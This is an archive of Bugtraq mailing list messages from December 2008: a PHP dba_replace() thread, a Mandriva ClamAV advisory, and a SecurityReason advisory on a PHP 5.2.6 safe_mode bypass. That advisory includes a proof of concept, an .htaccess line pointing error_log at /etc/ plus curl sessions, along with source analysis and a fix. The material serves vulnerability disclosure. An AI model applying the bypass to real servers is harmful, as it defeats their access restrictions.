List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5880 invoked from network); 6 Dec 2008 14:43:35 -0000
Cc: Maksymilian Arciemowicz <cxib@securityreason.com>,
bugtraq@securityfocus.com
Message-Id: <32F17A8E-60FA-444F-AD8D-C0B5BDCD826F@prohost.org>
From: Ilia Alshanetsky <ilia@prohost.org>
To: Eygene Ryabinkin <rea-sec@codelabs.ru>
In-Reply-To: <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v929.2)
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Date: Sat, 6 Dec 2008 10:00:14 -0500
References: <20081127235444.12197.qmail@securityfocus.com> <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0>
X-Mailer: Apple Mail (2.929.2)
Status:   

The PHP 4.X tree has been discontinued and all users should upgrade to  
the 5.x tree.


On 6-Dec-08, at 7:47 AM, Eygene Ryabinkin wrote:

> Maksymilian, Ilia, good day.
>
> Thu, Nov 27, 2008 at 11:54:44PM -0000, cxib@securityreason.com wrote:
>> [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
> [...]
>> - --- 1. dba_replace() destroying file ---
>>
>> Function dba_replace() are not filtring strings key and value. There
>> is a possibility the destruction of the file.
>
> This vulnerability exists in 4.x line as well and it is still  
> unpatched.
> Had verified it for dba extension from 4.4.9.
>
> According to the revision log,
>  http://cvs.php.net/viewvc.cgi/php-src/ext/dba/libinifile/inifile.c?view=log&pathrev> there is no fix in the official PHP tree for 4.x yet.
> -- 
> Eygene

Ilia Alshanetsky




From - Sat Dec  6 12:38:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d76
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38840-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 317EDEF04F
for <lists@securityspace.com>; Sat,  6 Dec 2008 12:37:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 03330143709; Sat,  6 Dec 2008 08:48:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29461 invoked from network); 6 Dec 2008 02:20:04 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=nlP4IWhNC3KcEn05Zp8A:9 a=sS8KkRL12Z14De1U9VEA:7 a=Y5RsxDt9q80OU386lBFLakfTZ7UA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:239 ] clamav
Date: Fri, 05 Dec 2008 19:42:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1L8n7I-0004as-5J@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:239
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : clamav
 Date    : December 5, 2008
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Ilja van Sprundel found that ClamAV contained a denial of service
 vulnerability in how it handled processing JPEG files, due to it
 not limiting the recursion depth when processing JPEG thumbnails
 (CVE-2008-5314).
 
 Other bugs have also been corrected in 0.94.2 which is being provided
 with this update.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 76beab75d863d50bba121d855c9b438b  2008.0/i586/clamav-0.94.2-1.1mdv2008.0.i586.rpm
 4fd30d06eaae9dd3485d1029b785b5d1  2008.0/i586/clamav-db-0.94.2-1.1mdv2008.0.i586.rpm
 3293ae92542961c7aff1270321e42c64  2008.0/i586/clamd-0.94.2-1.1mdv2008.0.i586.rpm
 edf97df009a6670637d9259e93e8fa4d  2008.0/i586/libclamav5-0.94.2-1.1mdv2008.0.i586.rpm
 a6c8e64a377e3cffe859fa1b9c369ccf  2008.0/i586/libclamav-devel-0.94.2-1.1mdv2008.0.i586.rpm 
 ad2a6c0a833e798109f7dafefe845c6b  2008.0/SRPMS/clamav-0.94.2-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 9be0855b803f6772371c94e613e609cc  2008.0/x86_64/clamav-0.94.2-1.1mdv2008.0.x86_64.rpm
 d61d7b9cdc5418209da894c1d557dc2f  2008.0/x86_64/clamav-db-0.94.2-1.1mdv2008.0.x86_64.rpm
 51fd1abb8528865ff3930dfbc497293f  2008.0/x86_64/clamd-0.94.2-1.1mdv2008.0.x86_64.rpm
 024a6a575ca469dc3f3044e50ff82611  2008.0/x86_64/lib64clamav5-0.94.2-1.1mdv2008.0.x86_64.rpm
 986d1b076adf3bed18a37fb7ffbb938b  2008.0/x86_64/lib64clamav-devel-0.94.2-1.1mdv2008.0.x86_64.rpm 
 ad2a6c0a833e798109f7dafefe845c6b  2008.0/SRPMS/clamav-0.94.2-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 cc37662a9b26623fbacdd49f6bd552f1  2008.1/i586/clamav-0.94.2-1.1mdv2008.1.i586.rpm
 447c0735aa918d5c8ba9dc603a830e84  2008.1/i586/clamav-db-0.94.2-1.1mdv2008.1.i586.rpm
 612c1311f2ec78ea72a821fcb5f69e9e  2008.1/i586/clamd-0.94.2-1.1mdv2008.1.i586.rpm
 d1cda95e0b38da35f601a21adf8a83ea  2008.1/i586/libclamav5-0.94.2-1.1mdv2008.1.i586.rpm
 e6debecc5127af9c9b6a1ce1b6856a14  2008.1/i586/libclamav-devel-0.94.2-1.1mdv2008.1.i586.rpm 
 4a85173474e49d304c0055cc4f9a50ee  2008.1/SRPMS/clamav-0.94.2-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 666d401ee9a3e5386c39dae18b706736  2008.1/x86_64/clamav-0.94.2-1.1mdv2008.1.x86_64.rpm
 f1e7e07f56c9ffa8671adc066ecd88d9  2008.1/x86_64/clamav-db-0.94.2-1.1mdv2008.1.x86_64.rpm
 68831cc7365c47c630df5edb1838206d  2008.1/x86_64/clamd-0.94.2-1.1mdv2008.1.x86_64.rpm
 23a274e8c5f558ae53a306bd00fee12e  2008.1/x86_64/lib64clamav5-0.94.2-1.1mdv2008.1.x86_64.rpm
 79196d7b4f6c0e7df71d2d6430be21ab  2008.1/x86_64/lib64clamav-devel-0.94.2-1.1mdv2008.1.x86_64.rpm 
 4a85173474e49d304c0055cc4f9a50ee  2008.1/SRPMS/clamav-0.94.2-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 e3bb00e5435ee0bc4e3ba34377cee784  2009.0/i586/clamav-0.94.2-1.1mdv2009.0.i586.rpm
 a2cd7d757a336f34058a55098dc600e8  2009.0/i586/clamav-db-0.94.2-1.1mdv2009.0.i586.rpm
 6904d7d8f7a35d2a65a4cfe40ef48bfa  2009.0/i586/clamd-0.94.2-1.1mdv2009.0.i586.rpm
 36c1e37a32f65cb96d24fd8b0db5f7e5  2009.0/i586/libclamav5-0.94.2-1.1mdv2009.0.i586.rpm
 f4f89d2acb7237ba6135ba54dccacaf9  2009.0/i586/libclamav-devel-0.94.2-1.1mdv2009.0.i586.rpm 
 d9954bb8eac45821b9f13e655fb7839e  2009.0/SRPMS/clamav-0.94.2-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 2355d0d75b0199682e71657db724e295  2009.0/x86_64/clamav-0.94.2-1.1mdv2009.0.x86_64.rpm
 3432b677b2a72802432cc96d92014f5b  2009.0/x86_64/clamav-db-0.94.2-1.1mdv2009.0.x86_64.rpm
 7bebc82ca05fecdc1768892dbd812c17  2009.0/x86_64/clamd-0.94.2-1.1mdv2009.0.x86_64.rpm
 ba9fdd676bb4ce545072a14e8e96f86c  2009.0/x86_64/lib64clamav5-0.94.2-1.1mdv2009.0.x86_64.rpm
 6e1c88a5a086126ea6df74fa0642e45f  2009.0/x86_64/lib64clamav-devel-0.94.2-1.1mdv2009.0.x86_64.rpm 
 d9954bb8eac45821b9f13e655fb7839e  2009.0/SRPMS/clamav-0.94.2-1.1mdv2009.0.src.rpm

 Corporate 3.0:
 0de774b0b919eaf9269bff1f9dbcc502  corporate/3.0/i586/clamav-0.94.2-0.1.C30mdk.i586.rpm
 79b305aa810908fa3e30b32a9ddc0a9a  corporate/3.0/i586/clamav-db-0.94.2-0.1.C30mdk.i586.rpm
 bcb7357561fb229201fa415dbbe1ba10  corporate/3.0/i586/clamd-0.94.2-0.1.C30mdk.i586.rpm
 a889cd1fa54443ed7f84b03a599b5dd7  corporate/3.0/i586/libclamav5-0.94.2-0.1.C30mdk.i586.rpm
 04895e0ca3f5f112562b3352bdd4e522  corporate/3.0/i586/libclamav-devel-0.94.2-0.1.C30mdk.i586.rpm 
 a307df060dcaa0c7d93c7cbd9f58e842  corporate/3.0/SRPMS/clamav-0.94.2-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 a56708d3e7bf8c6111a1f1b4b44d2571  corporate/3.0/x86_64/clamav-0.94.2-0.1.C30mdk.x86_64.rpm
 095bd1aa2b2295d555ca13c36f5778b4  corporate/3.0/x86_64/clamav-db-0.94.2-0.1.C30mdk.x86_64.rpm
 0c80591bfdccc63fe3818583b5fcb829  corporate/3.0/x86_64/clamd-0.94.2-0.1.C30mdk.x86_64.rpm
 1311da34900cd15ce38c14ff16b2c0dc  corporate/3.0/x86_64/lib64clamav5-0.94.2-0.1.C30mdk.x86_64.rpm
 fe66fd2f698a27b014b1c68e2bd019d8  corporate/3.0/x86_64/lib64clamav-devel-0.94.2-0.1.C30mdk.x86_64.rpm 
 a307df060dcaa0c7d93c7cbd9f58e842  corporate/3.0/SRPMS/clamav-0.94.2-0.1.C30mdk.src.rpm

 Corporate 4.0:
 392911d388217b1d55cf31a7bb2586ab  corporate/4.0/i586/clamav-0.94.2-0.1.20060mlcs4.i586.rpm
 77d8232d30d440220faf79d979fae533  corporate/4.0/i586/clamav-db-0.94.2-0.1.20060mlcs4.i586.rpm
 866326eaf820b549877f2c3126cdf2ba  corporate/4.0/i586/clamd-0.94.2-0.1.20060mlcs4.i586.rpm
 f2ba2c12b43ec1979424cddf8bb6c475  corporate/4.0/i586/libclamav5-0.94.2-0.1.20060mlcs4.i586.rpm
 6557632e03d2a4863326b49404dbdcd7  corporate/4.0/i586/libclamav-devel-0.94.2-0.1.20060mlcs4.i586.rpm 
 54d43f922df6e0ece09ec3c3ece7364a  corporate/4.0/SRPMS/clamav-0.94.2-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 72f5f30c460683914b27d257e2125688  corporate/4.0/x86_64/clamav-0.94.2-0.1.20060mlcs4.x86_64.rpm
 169f086d64243420757efd885c931a99  corporate/4.0/x86_64/clamav-db-0.94.2-0.1.20060mlcs4.x86_64.rpm
 cd2ac76205e5a866a0083a8aa741a052  corporate/4.0/x86_64/clamd-0.94.2-0.1.20060mlcs4.x86_64.rpm
 5b2ec74d5d3b07f0546d7e4c76072bb4  corporate/4.0/x86_64/lib64clamav5-0.94.2-0.1.20060mlcs4.x86_64.rpm
 c506b06df4cb84b77d626525d5c05025  corporate/4.0/x86_64/lib64clamav-devel-0.94.2-0.1.20060mlcs4.x86_64.rpm 
 54d43f922df6e0ece09ec3c3ece7364a  corporate/4.0/SRPMS/clamav-0.94.2-0.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJObfTmqjQ0CJFipgRAtM0AKCJYtlHyOIaSKU/vTnqy6euklannwCg4o9r
kxD6kNYfUfrH+9OQcCbhks0=HAZR
-----END PGP SIGNATURE-----

From - Sat Dec  6 12:58:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d77
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38843-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CD3A8EF04F
for <lists@securityspace.com>; Sat,  6 Dec 2008 12:53:58 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C3D3F237019; Sat,  6 Dec 2008 10:41:19 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11767 invoked from network); 6 Dec 2008 17:31:15 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=simple; s=one; d=codelabs.ru;
h=Received:Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:Content-Type:Content-Disposition:In-Reply-To:Sender;
b=SFZDzyvAv2rCqKerTze4f2AsrhzhVHYmXCIFSDrquMzSuFCMLRutap+8BHI2Hcya5nKOqRnCBjaWiK0dI8MYydHWB/LTzogs9RbBpoALC0uferBYu5X8qm4lNLlczVUtAALtyEnMCy2/XvgfX1KnPc7oVsOHh3SazjQDK7SWDFE=;
Date: Sat, 6 Dec 2008 20:48:05 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: Ilia Alshanetsky <ilia@prohost.org>
Cc: Maksymilian Arciemowicz <cxib@securityreason.com>,
bugtraq@securityfocus.com
Subject: Re: SecurityReason : PHP 5.2.6 dba_replace() destroying file
Message-ID: <DL5tOxkrW0n9ovGfT03KXUCfCn4@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <20081127235444.12197.qmail@securityfocus.com> <SZBVsRN2yvv5bQ7qjQDFibMNik0@kjaK+/sQ5DW5981v71UogZJPf/0> <32F17A8E-60FA-444F-AD8D-C0B5BDCD826F@prohost.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
In-Reply-To: <32F17A8E-60FA-444F-AD8D-C0B5BDCD826F@prohost.org>
Sender: rea-sec@codelabs.ru
Status:   

Ilia, good day.

Sat, Dec 06, 2008 at 10:00:14AM -0500, Ilia Alshanetsky wrote:
> The PHP 4.X tree has been discontinued and all users should upgrade to  
> the 5.x tree.

Ah, I see -- it is even written in red on the official site.  Thanks for
clarifications.

But still, as some vendors are providing 4.x, may be advisory should
mention it as well?

Thanks.
-- 
Eygene

From - Sat Dec  6 16:18:49 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d7f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38845-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AB666EF04F
for <lists@securityspace.com>; Sat,  6 Dec 2008 16:11:52 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 98E49237041; Sat,  6 Dec 2008 13:59:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23854 invoked from network); 6 Dec 2008 19:36:23 -0000
Date: Sat, 6 Dec 2008 12:40:48 -0700
Message-Id: <200812061940.mB6JemE5002856@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: cxib@securityreason.com
To: bugtraq@securityfocus.com
Subject: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- - Written: 20.11.2008
- - Public: 05.12.2008

SecurityReason Research
SecurityAlert Id: 59

SecurityRisk: High

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://pl.php.net/manual/pl/refs.utilspec.server.php

- --- 1.PHP 5.2.6 SAPI php_getuid() overload ---

Using PHP 5.2.6, as a Apache module can bypass many security points. To understand this issue, first we need know, where is the problem.

127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x  2 www  www  512 Sep 10 03:49 .
drwxr-xr-x  4 www  www  512 Sep 10 03:41 ..
- -rw-r--r--  1 www  www   26 Sep 10 03:49 .htaccess
- -rw-r--r--  1 www  www   33 Sep 10 03:49 not.php
- -rw-r--r--  1 www  www  107 Sep 10 03:49 pufff.php
- -rw-r--r--  1 www  www   27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value       error_log       /etc/
127# cat not.php
<?php
    echo "only echo\n";
?>
127# cat pufff.php
<?php
    echo "safe_mode=".ini_get("safe_mode")."\n";
    echo "error_log=".ini_get("error_log")."\n";
?>
127# cat sleep.php
<?php
    sleep(60*2); 
?>
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127#

Now error_log is empty

Example exploit:

127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/


any new "apache child" process, allow overload environment like error_log.


127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd
127#So what is wrong?

Let's try to understand this problem. Let's start with a difference

www   6361  0.0  0.5 18676 14248  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd

and 

www   6361  0.0  0.5 18676 14288  ??  S     4:01AM   0:00.00 /usr/local/sbin/httpd

RSS: 14288-14248 = 40

memory leak? No.

In first request, we have declared error_log, via .htaccess.

- --- main/main.c ---
..
STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog, error_log, php_core_globals, core_globals)
..
- --- main/main.c ---


goto OnUpdateErrorLog


- --- main/main.c ---
..
static PHP_INI_MH(OnUpdateErrorLog)
{
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS) &&
strcmp(new_value, "syslog")) {
if (PG(safe_mode) && (!php_checkuid(new_value, NULL, CHECKUID_CHECK_FILE_AND_DIR))) {
return FAILURE;
}

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC)) {
return FAILURE;
}

}
OnUpdateString(entry, new_value, new_value_length, mh_arg1, mh_arg2, mh_arg3, stage TSRMLS_CC);
return SUCCESS;
}
..
- --- main/main.c ---


(!php_checkuid(new_value, NULL, CHECKUID_CHECK_FILE_AND_DIR)) <==> False

deeper into safe_mode.c, function php_checkuid()


- --- main/safe_mode.c ---
..
uid = sb.st_uid;
gid = sb.st_gid;
if (uid == php_getuid()) {
return 1;
..
duid = sb.st_uid;
dgid = sb.st_gid;
if (duid == php_getuid()) {
..
- --- main/safe_mode.c ---


php_getuid() does not return the correct value at the time of checking safe_mode
for "/etc/"

First request
uid = php_getuid() <==> True
0 <=> uid <=> php_getuid() <==> True

Next request:
uid = php_getuid() <==> False
0 <=> 80 <==> False

because
80 (www uid) = php_getuid()
0 = uid (/etc/ owned by root)


- --- ext/standard/pageinfo.h ---
..
extern long php_getuid(void);
..
- --- ext/standard/pageinfo.h ---

- --- ext/standard/pageinfo.c ---
..
long php_getuid(void)
{
TSRMLS_FETCH();

php_statpage(TSRMLS_C);
return (BG(page_uid));
}
..
- --- ext/standard/pageinfo.c ---

- --- ext/standard/pageinfo.c ---
..
pstat = sapi_get_stat(TSRMLS_C);

if (BG(page_uid)==-1 || BG(page_gid)==-1) {
if(pstat) {
BG(page_uid)   = pstat->st_uid;
..
- --- ext/standard/pageinfo.c ---


php_getuid() will return corrected value, after first request. 

Let's see to SAPI.c


- --- SAPI.c ---
..
SAPI_API struct stat *sapi_get_stat(TSRMLS_D)
{
if (sapi_module.get_stat) {
return sapi_module.get_stat(TSRMLS_C);
..
- --- SAPI.c ---


for apache 1.3.41, mod_php5.c

- --- mod_php5.c ---
..
/* {{{ php_apache_get_stat
 */
static struct stat *php_apache_get_stat(TSRMLS_D)
{
return &((request_rec *) SG(server_context))->finfo;
}
..
- --- mod_php5.c ---

SG(server_context) <=> 0x0

that same situation in sapi_apache2.c for Apache2


Where is problem? In:

if (BG(page_uid)==-1 || BG(page_gid)==-1) 

For varibles in .htaccess, BG(page_uid) isn't set.


(BG(page_uid)==-1 || BG(page_gid)==-1) <==> False

=>

( BG(page_uid) <=> 0 <=> BG(page_gid) ) <==> True



uid(0) <=> root

for the values of the .htaccess


This analysis was for variable error_log. We can not determine all the possible use of this error. 

There are other potential uses this issue. SecurityReason is not going to release a official exploit to the general public.

- --- 2. How to fix (proof) ---
5.2.7

proof:

0 Step. Add, into main/main.c
- --
static PHP_INI_MH(OnUpdateErrorLog)
{
/* Only do the safemode/open_basedir check at runtime */
+ BG(page_uid)=-2; // -2 isnt registred 
+ BG(page_gid)=-2; // -2 isnt registred
- --

1 Step. Add, into pageinfo.c, end of the main loop in php_statpage()
- ---
- - }
+ } else if (BG(page_uid)==-2 || BG(page_gid)==-2) {
+ BG(page_uid) = getuid();
+ BG(page_gid) = getgid();
+ }
- ---

It is fix ONLY for error_log in .htaccess. 

Official fix
http://cvs.php.net/viewvc.cgi/php-src/sapi/apache/mod_php5.c?r1=1.19.2.7.2.15&r2=1.19.2.7.2.16&diff_format=u
http://cvs.php.net/viewvc.cgi/php-src/ext/standard/basic_functions.c?r1=1.725.2.31.2.78&r2=1.725.2.31.2.79&diff_format=u
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1340&r2=1.2027.2.547.2.1341&diff_format=u

- --- 3. Greets ---
Stanislav Malyshev sp3x Chujwamwdupe p_e_a schain pi3 Infospec

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)

iEYEARECAAYFAkk5OIQACgkQpiCeOKaYa9a95wCgiTT2Fl6SNQbFDnHWyQTtlkG8
g0gAoJzijUB94mtnCGlK/7/cFDw9R2gD
=Q0rV
-----END PGP SIGNATURE-----

From - Mon Dec  8 10:49:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004efe
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38846-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B5BB3ECAE9
for <lists@securityspace.com>; Mon,  8 Dec 2008 10:47:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 428DA236FDD; Mon,  8 Dec 2008 08:32:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29387 invoked from network); 7 Dec 2008 16:06:12 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
Message-Id: <20081207162255.3BC36327719@morgana.loeki.tv>
Date: Sun,  7 Dec 2008 17:22:55 +0100 (CET)
From: thijs@debian.org (Thijs Kinkhorst)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
